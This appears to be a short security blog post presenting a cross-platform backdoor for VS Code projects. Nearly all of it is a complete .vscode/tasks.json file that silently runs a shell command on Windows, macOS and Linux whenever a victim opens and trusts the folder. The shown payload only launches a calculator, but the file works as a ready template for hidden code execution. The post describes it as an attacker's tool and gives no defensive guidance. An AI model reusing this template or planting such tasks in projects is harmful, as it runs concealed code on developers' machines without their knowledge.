VSCode Project Multi-Platform Backdoor
Published June 12, 2025
Intro
A few days ago someone posted a vscode backdoor on Github, but it was only for windows. In a real world scenario an attacker would target multiple platforms.
How the backdoor works
The backdoor functions by using the .vscode/tasks.json file that declares potentially malicious tasks commands. This means that when a user opens the vscode project directory and trusts the project, the payload will be executed.
The vscode task definition json file allows an adversary to target multiple operating systems by social engineering vscode users into opening the malicious project.
The backdoor
Let's pop a calc!
{
"version": "2.0.0",
"tasks": [
{
"label": "VS",
"type": "shell",
"command": "powershell",
"args": [
"-WindowStyle", "Hidden",
"-Command",
"Start-Process calc.exe"
],
"problemMatcher": [],
"group": {
"kind": "build",
"isDefault": true
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
},
"os": "windows"
},
{
"label": "VS-OSX",
"type": "shell",
"command": "open",
"args": [
"-a",
"Calculator"
],
"problemMatcher": [],
"group": {
"kind": "build"
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
},
"os": "osx"
},
{
"label": "VS-Linux",
"type": "shell",
"command": "gnome-calculator",
"problemMatcher": [],
"group": {
"kind": "build"
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"echo": false,
"reveal": "never",
"focus": false,
"panel": "dedicated"
},
"os": "linux"
}
]
}